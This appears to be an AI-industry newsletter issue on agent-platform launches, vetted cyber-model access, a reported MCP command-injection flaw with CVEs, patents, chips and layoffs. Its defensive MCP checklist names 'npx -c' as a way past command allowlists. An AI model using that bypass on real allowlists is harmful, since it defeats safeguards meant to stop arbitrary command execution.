The Agent OS War went public. — Issue #010

Every major AI lab shipped an agent operating system in one week.

Between April 14 and April 17, OpenAI put Codex on your desktop and a life sciences model in your lab. Anthropic dropped Opus 4.7 and Claude Design inside 24 hours. Google embedded subagents into Gemini CLI and published a new generative UI standard. Alibaba open-sourced an MoE with 262K native context that runs on Apple Silicon. xAI quietly rolled out a pixel-reading desktop agent. Perplexity shipped Personal Computer for Mac and its CEO said out loud what every lab was thinking: “A traditional operating system processes commands; an AI operating system focuses on goals.” Cadence launched a chip-design orchestrator that NVIDIA is already using internally. The Control Plane War we flagged in #008 stopped being positioning and started being product — all in 96 hours.

While that shipping frenzy was happening, OpenAI quietly matched Anthropic’s most controversial move from last week — but more openly. Security researchers dropped receipts proving the protocol most of those agents depend on has remote code execution by design across 200,000+ servers. Anthropic’s response: working as intended. A patent broker put a portfolio up for sale that reads directly onto every multi-agent framework in production. And a sneaker company rebranded as a GPU-rental startup, surged as much as 800% intraday, and added $127 million in market cap on zero operational history.

The model era is over. The workspace era is real. Here’s what matters.

⚡ The Agent OS War Went Public

Six labs. Five days. One thesis: models aren’t the product anymore.

If you count the releases, there were more than a dozen significant drops from six labs inside a single week. If you read the pattern, there was one: labs are competing on agent operating systems now, not on models. The workspace, runtime, memory, orchestration, and handoff layer is the frontier. Raw capability is table stakes.

OpenAI shipped three things in 48 hours. Codex for (almost) everything (April 16) added background computer use on macOS — multiple agents clicking and typing on your Mac in parallel while you keep working in other apps. Plus 90+ plugins, an in-app browser you can comment on, gpt-image-1.5 image generation, a memory preview that learns your preferences, and scheduled future work that can wake up days or weeks later. The Agents SDK update (April 15) added native sandbox execution, a model-native harness, and built-in support for Blaxel, Cloudflare, Daytona, E2B, Modal, Runloop, and Vercel. And GPT-Rosalind (April 16) is OpenAI’s first vertical frontier model — life sciences, gated access, with Amgen, Moderna, the Allen Institute, and Thermo Fisher Scientific as launch customers plus an existing collaboration with Los Alamos on protein and catalyst design. Access is gated through a Trusted Access Program for qualified US enterprise customers; during the preview, usage doesn’t consume tokens or credits for approved orgs.

Anthropic answered with back-to-back launches. Claude Opus 4.7 (April 16) hit 87.6% on SWE-bench Verified (up from 80.8%), tripled vision resolution to 3.75MP, added an xhigh effort level and task budgets, and held pricing at $5/$25 per million tokens. Claude Design (April 17) is the first product under a new “Anthropic Labs” sub-brand — prompt-to-prototype, reads your codebase to apply your design system automatically, hands off to Claude Code with one click. Brilliant reported 20+ prompts in Figma reduced to 2 prompts in Claude Design. Datadog compressed a week-long briefs/mockups cycle into a single conversation. Figma dropped about 6% and Adobe about 2.7% the day The Information leaked the news. Mike Krieger (Anthropic’s CPO) resigned from Figma’s board the same day.

Google shipped quietly but consistently. Gemini CLI v0.38.1 (April 16) made subagents public — Markdown-defined specialists with isolated context windows, @agent delegation syntax, parallel execution, and remote subagents via the A2A protocol. A2UI v0.9 (April 17) is a framework-agnostic standard for portable generative UI, with transport support across MCP, WebSockets, REST, and A2A. Neither made front-page headlines. Both are protocol plays that compound.

Alibaba’s Qwen team open-sourced Qwen3.6-35B-A3B (April 16) — Apache 2.0, 35B total / 3B active MoE, 262K native context extensible to 1M tokens, targeted directly at agentic coding. Runs on Apple Silicon via MLX. You can pull it from Hugging Face and run it locally right now.

xAI quietly rolled out Grok Computer in private beta (April 13) — a pixel-reading desktop agent that drives any software, including legacy apps without APIs. Then shipped Grok 4.3 beta (April 17) at $300/month behind the SuperGrok Heavy paywall. 2M context (bigger than Claude’s 200K or GPT’s 128K). Grok’s memory story is still thin — the API is stateless unless you pass prior messages yourself, and consumer-app memory is partial at best. That’s the gap keeping Grok from being a serious daily driver for long-horizon work.

Perplexity — not a frontier lab, but a frontier orchestrator — rolled out Personal Computer for Mac (April 16) to all Perplexity Max subscribers ($200/month) and waitlist members. Press both Command keys, activate by voice or text, and an agent runs across your local files, native apps, iMessage, Apple Mail, Calendar, and Comet browser. On a Mac mini it runs 24/7 in the background; start a task from your iPhone and it executes on your desktop using 2FA. CEO Aravind Srinivas, at the launch: “A traditional operating system processes commands; an AI operating system focuses on goals.” That’s not marketing. That’s a CEO stating the entire thesis of this section out loud, then shipping against it in the same week as every lab in the industry.

And at CadenceLIVE Silicon Valley (April 15), Cadence unveiled AgentStack — a head agent orchestrating specialized sub-agents across RTL, verification, physical design, custom/analog, and system-level workflows. NVIDIA is an early customer using it for its own chip design. Early deployments report 10x productivity gains.

Here’s what actually matters for builders: If you’re evaluating where to commit your agent stack for the next 18 months, this week just changed the calculus. The Claude Design → Claude Code handoff bundle is real lock-in. So is OpenAI’s plugin ecosystem. Google’s protocol-first approach stays portable at the cost of fewer batteries-included features. Perplexity’s orchestrator-across-20-models play is the opposite bet — portability as a feature, at $200/month for a Mac mini you already own. You’re not picking a model anymore. You’re picking a development stack, a deployment substrate, and in some cases a company-wide commitment.

Hype vs. Reality: 8/10 — This is real infrastructure shipping, not vaporware. The lock-in is real, the security implications (keep reading) are real, and the iteration velocity is insane. Pick carefully.

🔫 OpenAI Played Anthropic’s Cyber Move — More Openly

GPT-5.4-Cyber went to thousands of vetted defenders. Mythos went to 50 hand-picked orgs.

Last week we covered Project Glasswing — Anthropic’s $100M cybersecurity coalition built around Claude Mythos Preview, handed to roughly 50 organizations including AWS, Apple, Microsoft, Google, NVIDIA, CrowdStrike, and JPMorgan. Tight coalition. Curated partners. Restricted rollout.

On April 14, OpenAI shipped GPT-5.4-Cyber through an expanded Trusted Access for Cyber (TAC) program. Same basic concept: a cyber-permissive variant with lower refusal boundaries for legitimate defensive work, plus binary reverse engineering capabilities that vanilla GPT-5.4 refuses. Different distribution strategy: thousands of verified individual defenders and hundreds of teams, with identity-verified signup at chatgpt.com/cyber.

Fouad Matin, OpenAI’s cyber researcher, at the launch briefing: “This is a team sport. No one should be in the business of picking winners and losers when it comes to cybersecurity.”

That’s a direct shot at Glasswing’s hand-picked coalition.

The distinction matters. Anthropic bet on curated partnerships with deep commitments. OpenAI bet on democratized-but-verified access — if you can prove you’re a defender, you can use it. Both approaches are legitimate. Only one matches the “don’t gatekeep the future” posture every lab claims to have.

Why it matters for builders: If you do security work — pentesting, vulnerability research, red-teaming, responsible disclosure — GPT-5.4-Cyber is the first frontier-class cyber model with a path to access that doesn’t require a Fortune 500 letterhead. Verify your identity. Apply. Get the model.

Hype vs. Reality: 7/10 — “More open” still means vetted; this isn’t a public API. But it’s a notably different philosophy from Glasswing, and it shipped exactly one week later. That’s not a coincidence.

🚨 Meanwhile, Security Researchers Called Anthropic’s Bluff

Project Glasswing was last week. MCP’s RCE-by-design was this week.

One week after Anthropic launched a $100M initiative to use Mythos for finding zero-days in other people’s software, security researchers at OX Security dropped what they’re calling “The Mother of All AI Supply Chains.”

The target: Anthropic’s Model Context Protocol. The finding: remote code execution by design.

200,000+

MCP server instances vulnerable to command injection across 150 million downloads and 10+ issued CVEs.

The MCP STDIO interface executes arbitrary OS commands. By design. Any developer using Anthropic’s official MCP SDK in Python, TypeScript, Java, or Rust inherits the exposure.

CVE-2026-30615 is a zero-click RCE on Windsurf — a victim visits a malicious webpage, commands execute locally, no interaction required. Cursor, VS Code, Claude Code, Gemini-CLI, GitHub Copilot, and OpenAI Codex all contain the same MCP STDIO code. OX Security ran proof-of-concept attacks on six live production platforms with real paying customers. They successfully “poisoned” 9 out of 11 MCP marketplaces by uploading a benign test payload.

OX disclosed the findings to Anthropic in November 2025 and spent months working through 30+ responsible disclosures. Anthropic’s response, repeatedly: “expected behavior.” The company updated its SECURITY.md to note that STDIO adapters should be “used with caution.” It declined all four architectural fixes OX proposed — manifest-only execution, command allowlisting, dangerous-mode opt-in flags, and signed marketplace verification.

Davi Ottenheimer at flyingpenguin summed it up: “Execute first, validate never.”

The contradiction is the story. You cannot build a $100M coalition to secure the world’s software with AI while refusing to apply the same “secure by default” thinking to the protocol every AI agent uses. Either MCP gets architecturally hardened, or Glasswing’s messaging collapses under its own receipts.

Why it matters for builders: If you run MCP servers — in Claude Code, Cursor, VS Code, or anywhere else — assume the STDIO layer is a remote code execution path unless you’ve explicitly sanitized it. Tactical checklist is in Quick Signals below.

Hype vs. Reality: 9/10 on the research. Real technical work, responsible disclosure, verifiable CVEs. Anthropic’s response makes this worse, not better.

⚖️ The Patent Trolls Just Showed Up

Nobody’s talking about this yet. Everyone building agents should.

On April 16, while every AI lab was shipping agent infrastructure, patent broker Vitek IP put a portfolio up for sale. Two US patents, described in Vitek’s listing as “originally developed by Bao Tran, a Silicon Valley tech futurist” — though USPTO records show at least one of the patents is assigned to a separate entity, Proactive AI Lab, Inc., with a roster of named inventors that doesn’t include Tran. The broker’s “originally developed by” framing is doing some work. Either way, the patents cover: multi-agent orchestration systems, orchestrator agents coordinating specialized sub-agents, natural language intent extraction, dynamic task routing, and a secure AI assistant using a locally deployed LLM with encrypted vector databases and retrieval-augmented generation.

That’s a plain-English description of OpenAI’s Agents SDK and Anthropic’s Claude Managed Agents.

Per Vitek’s listing, the orchestration patent has 19 years of life remaining. The privacy/RAG patent has 18. Vitek says it has “developed claim charts outlining the demonstrated use and value of the patented technology across leading AI platforms.” The firm intends to finalize a transaction in Q3 2026.

Translation: they’re ready to send cease-and-desist letters the minute a buyer signs. If a patent troll acquires these, every multi-agent framework in production becomes a licensing target. The Agents SDK you just read about. Every MCP orchestrator. Every production LangChain deployment. Every startup building on CrewAI, Multica, or OpenClaw.

This isn’t theoretical. Vitek has a track record — they brokered Data Culpa’s data pipeline portfolio in February, VoxSmart’s VoIP portfolio on April 15, and a Matthew Carroll AR content portfolio in March. Claim charts are how you prep for litigation, not just licensing.

Why it matters for builders: If you’re building on multi-agent frameworks for a VC-backed startup, get your counsel watching this portfolio’s sale. If you’re an enterprise buyer, start documenting your architectural independence from the specific claims in those patents now — not after a demand letter arrives. The tech matured; the lawyers noticed.

Hype vs. Reality: 8/10 — This is a real, credible threat. The fact that nobody’s talking about it doesn’t mean it won’t matter in six months.

🏗️ The Custom Silicon Race Got Public

Cerebras filed its S-1. Meta committed more than 1GW to Broadcom. The Nvidia hedge is no longer theoretical.

Two Nvidia-alternative plays shipped the same week.

Cerebras filed its S-1 on April 17, targeting a Nasdaq listing under CBRS. Morgan Stanley, Citigroup, Barclays, and UBS leading. The numbers Cerebras put in the filing: 2025 revenue $510M (up 76% from $290.3M), net income $87.9M (versus a $485M loss in 2024), and $24.6B in remaining performance obligations including the $20B+ OpenAI contract for 250MW/year 2026–28 with an option for another 1.25GW through 2030. Reports from around the filing put the target valuation in the $22–25B range with an approximately $2B raise, though share count and pricing aren’t set in the official filing. WSE-3 chip is 57x the physical size of an H100 — 4 trillion transistors, 900,000 cores.

The twist: OpenAI’s deep financial entanglement with Cerebras — reportedly including warrants on non-voting shares and a nine-figure loan — turns this IPO into a feedback loop. Last week’s Oracle cuts were the free-cash-flow side of AI’s capex story. Cerebras’s S-1 is the raise-real-money side.

Meta extended its custom silicon deal with Broadcom through 2029 on April 14 — an initial commitment of more than 1GW of compute capacity (enough to power roughly 750,000 US homes), described as the first phase of a “sustained, multi-gigawatt rollout.” MTIA chips moving to 2nm process, Broadcom’s XPU platform for design/packaging/networking. Broadcom CEO Hock Tan is leaving Meta’s board for a strategic advisory role focused on the custom silicon roadmap.

Stack it up: Meta’s committed up to 6GW of AMD Instinct GPUs, millions of Nvidia chips, custom Arm silicon, and $115–135B in 2026 AI capex. A pattern emerges. The hyperscalers don’t want to be Nvidia’s customers forever. They want to be their own silicon companies.

Why it matters for builders: GPU pricing is about to get weird. If hyperscalers absorb 20–30% of inference onto custom silicon by 2027–28, spot GPU pricing in cloud markets could drop. Or it could spike if the custom chips miss targets and Nvidia demand rises. Either way, multi-year GPU forward commitments right now carry more downside than they did six months ago.

👀 A Shoe Company Became a GPU Startup

NASDAQ:BIRD → NASDAQ:NBRD. 800% intraday. Zero AI infrastructure experience.

On April 15, Allbirds — the certified-B-Corp wool sneaker brand once valued at $4B — announced it was selling its footwear assets to American Exchange Group for $39M, executing a $50M convertible financing facility with an unnamed institutional investor, and rebranding as NewBird AI. The pivot: “GPU-as-a-Service and AI-native cloud solutions.”

The stock surged as much as 800% intraday, closed up 582%, and added roughly $127M in market cap — on zero operational history in AI compute, no announced customers, no disclosed team, and a $50M raise that’s a rounding error against CoreWeave’s or Lambda Labs’ scale. The company also abandoned its founding environmental commitments.

Steve Sosnick, chief strategist at Interactive Brokers, on CNN Business: “A 6x or 7x move for a company that is literally ditching its prior business model for one in which it has no demonstrated expertise says quite a bit about market froth and investor willingness to chase moves.”

Let’s be real: this is Long Island Iced Tea → Long Blockchain Corp from 2017, recycled for the AI bubble. A shell company, a ticker change, a press release invoking the magic words, and a retail pile-on. The Allbirds sitting in Silicon Valley closets didn’t turn into H200s overnight.

Hype vs. Reality: 2/10 — If you’re buying this stock because of the rebrand, you’re the exit liquidity. The “market cap went up $127M” part is real. The “GPU company now” part is aspirational at best.

📡 Quick Signals

The other stories that matter this week

GLM-5.1 cracked the Code Arena top 3. Z.ai’s open-source, MIT-licensed GLM-5.1 posted 1530 Elo on Code Arena on April 10 — third globally, behind only Claude Opus 4.6-thinking and 4.6, ahead of every GPT and Gemini model. Trained on 100,000 Huawei Ascend 910B chips. Zero Nvidia involvement. First open-weight model to crack the top 3 on a human-voted coding leaderboard.

Microsoft’s April Patch Tuesday included a wormable Windows RCE. CVE-2026-33827 is a remote, unauthenticated TCP/IP RCE affecting systems with IPv6 + IPSec enabled. No user interaction required. Race condition, so reliability varies, but this is worm material. Patch now if you’re on IPv6. Separately, CVE-2026-32201 is a SharePoint spoofing vulnerability under active exploitation.

Stanford’s 2026 AI Index dropped macro receipts. The biggest number: AI agent task success on OSWorld — the benchmark that tests agents on real computer tasks across operating systems — jumped from 12% to 66.3% in a single year, within 6 points of human performance. SWE-bench Verified went from ~60% to near 100%. The U.S.–China model gap narrowed to 2.7%. Documented AI incidents rose to 362 in 2025 (up from 233). The agent OS thesis has the data now.

Snap laid off 1,000 people and said the quiet part out loud. On April 15, CEO Evan Spiegel cut 16% of full-time staff and closed 300 open roles, citing “rapid advancements in artificial intelligence” and noting that 65% of new Snap code is now AI-generated. $500M in annualized cost savings by H2 2026, $95–130M in restructuring charges, activist investor Irenic Capital (2.5% stake) pushing for more cuts. Stock popped 7–11% on the news. Stack this with Oracle’s cuts from last week: the “AI makes us more productive, so we need fewer people” layoff wave is no longer a rumor — it’s a stated corporate strategy, and it’s disproportionately hitting software engineers and customer service teams.

London just became the #2 AI capital. OpenAI signed a lease on April 13 for an 88,500 sq ft King’s Cross office with capacity for 500+ (more than double its current UK headcount). Anthropic answered on April 16 with a 158,000 sq ft Knowledge Quarter space for 800 people — four times its current London team. Both moves came after the UK government courted each company hard. Anthropic’s expansion lands in the same neighborhood as DeepMind, Meta, and OpenAI, and deepens its relationship with the UK AI Security Institute, which just published a risk evaluation of Claude Mythos Preview. Context: Anthropic was designated a “supply chain risk” by the Pentagon in March. OpenAI paused its UK Stargate data center project over power costs on April 10. Both are now betting their largest non-US research presence on London.

MCP tactical checklist (from OX Security’s recommendations): Block public IP access to MCP-connected services. Treat external MCP configuration input as untrusted — no user input should reach StdioServerParameters. Install only from verified sources like the official GitHub MCP Registry. Audit command allowlists for bypass vectors like npx -c. Patch Anthropic’s official MCP SDK the moment a hardening update ships — and pressure them to ship one.

🎯 The Playbook

Your moves this week

Pick your agent OS lane now, knowing it’s lock-in. Codex + OpenAI’s plugin ecosystem, Claude Design + Claude Code handoff, Gemini CLI with remote subagents, Perplexity’s orchestrator-across-20-models Mac app, or self-host on Qwen3.6. Each is a commitment. The open-weight path costs more engineering effort but stays portable. Perplexity is the hedge: orchestration without training a model of their own. The closed paths buy velocity at the price of vendor dependency.
Apply for Trusted Access for Cyber if you do security work. chatgpt.com/cyber. Identity verification, not a Fortune 500 letterhead. Binary reverse engineering plus lower refusal on legitimate defensive work is genuinely useful capability.
Audit every MCP server you run. Assume the STDIO layer is a remote code execution path. Block public IP access, sanitize configuration input, install only from verified registries. If you’re running Claude Code, Cursor, Windsurf, VS Code, or Gemini-CLI, patch MCP dependencies as soon as hardening updates ship.
Put “AI agent orchestration patents” on your legal team’s watchlist. The Vitek IP portfolio hasn’t sold yet. When it does, demand letters will be the buyer’s first move, not their last. Start documenting architectural independence from claims like “orchestrator routing to containerized specialized agents based on real-time metrics.”
Pull Qwen3.6-35B-A3B and run it locally. Apache 2.0, 262K native context, runs on Apple Silicon via MLX. Worth a weekend of evaluation even if you don’t plan to deploy. The gap between open-weight and frontier is now measured in single percentage points on coding benchmarks.
Reassess your GPU reservations before June. Meta committing 1GW+ to Broadcom, Cerebras filing S-1, and hyperscalers absorbing 20–30% of inference onto custom silicon by 2027–28 means current GPU forward contracts may not age well. Shorter reservations, more optionality, and at least one non-cloud backup plan.
If you lead a team, start measuring AI-assisted output now. Snap just publicly attributed layoffs to AI. Oracle did the same. Whether you like that framing or not, the boards and activist investors pushing for it are the same boards and activist investors who will push your CEO next. Measure what your team ships with and without AI, document the delta, and get ahead of the conversation before it becomes a spreadsheet with your headcount on it.

🔥 What’s Viral Right Now

Codex operating your Mac in the background — the demo of Codex spinning up three agents to click through three apps while the user kept working has been the most-shared AI clip of the week. OpenAI’s answer to Anthropic’s Claude Cowork is more visible and more immediate.

Claude Design vs. Figma — Figma dropped about 6% and Adobe about 2.7% the day The Information leaked the news. @aakashgupta on X: “A product that doesn’t exist yet just vaporized billions.” The product now exists.

The MCP “by design” response — OX Security’s thread on the Anthropic disclosure process has been circulating across security Twitter for four days. The screenshots of Anthropic’s “expected behavior” replies are the part security folks are sharing. Glasswing’s credibility is taking its first real hit.

BIRD → NBRD — the Allbirds chart is already a meme. CNN Business’s headline (“Allbirds shares soar on a very 2026 pivot to AI”) is getting recycled in every bubble thread on X.

“A Mac mini, but it’s your employee” — Perplexity’s Personal Computer launch got traction in the “AI as digital coworker” frame. Srinivas’s line about goals vs. commands is getting reposted across product Twitter. The $200/month price tag is getting the opposite treatment.

Stay building. 🛠️

— Matt